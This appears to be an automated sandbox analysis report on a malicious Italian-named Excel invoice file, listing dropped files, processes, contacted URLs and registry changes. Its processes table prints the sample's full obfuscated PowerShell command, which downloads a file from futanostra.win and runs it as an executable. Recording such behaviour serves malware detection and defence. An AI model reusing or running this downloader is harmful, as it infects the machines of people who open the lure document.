Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
fattura_062 (1).xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application:
Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date:
Wed Aug 9 12:45:36 2017, Security: 0
|
initial sample
|
 |
|
|
C:\Users\user\Desktop\fattura_062 (1).xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application:
Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date:
Wed Aug 9 12:45:36 2017, Security: 0
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\a0uakkwj.mav.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\we0q1c3n.dql.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF46E6AAF31F73CBB2.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF8E390AA12C78A9CD.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFEDED12047109702F.TMP
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\33EB9B09.tmp (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application:
Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date:
Wed Aug 9 12:45:36 2017, Security: 0
|
dropped
|
||
|
C:\Users\user\Desktop\58230000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Last Saved By: user, Name of
Creating Application: Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003,
Last Saved Time/Date: Thu Oct 31 13:09:47 2024, Security: 0
|
dropped
|
||
|
C:\Users\user\Desktop\58230000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
modified
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject
';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess
''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject
';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess
''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)
|
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://futanostra.win
|
unknown
|
|
|
|
https://futanostra.win/foglio.ful
|
unknown
|
|
|
|
https://futanostra.wi
|
unknown
|
|
|
|
https://futanostra.win/foglio.fu
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
futanostra.win
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.168.2.255
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
+g0
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1040
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2C7D1
|
2C7D1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{DE91093F-7D66-4F8D-BFD1-D93ED296248B}\2.0
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{DE91093F-7D66-4F8D-BFD1-D93ED296248B}\2.0\FLAGS
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{DE91093F-7D66-4F8D-BFD1-D93ED296248B}\2.0\0\win32
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{DE91093F-7D66-4F8D-BFD1-D93ED296248B}\2.0\HELPDIR
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\TypeLib\{DE91093F-7D66-4F8D-BFD1-D93ED296248B}\2.0
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\TypeLib\{DE91093F-7D66-4F8D-BFD1-D93ED296248B}\2.0\FLAGS
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\TypeLib\{DE91093F-7D66-4F8D-BFD1-D93ED296248B}\2.0\0\win32
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\TypeLib\{DE91093F-7D66-4F8D-BFD1-D93ED296248B}\2.0\HELPDIR
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
*q0
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32913
|
32913
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
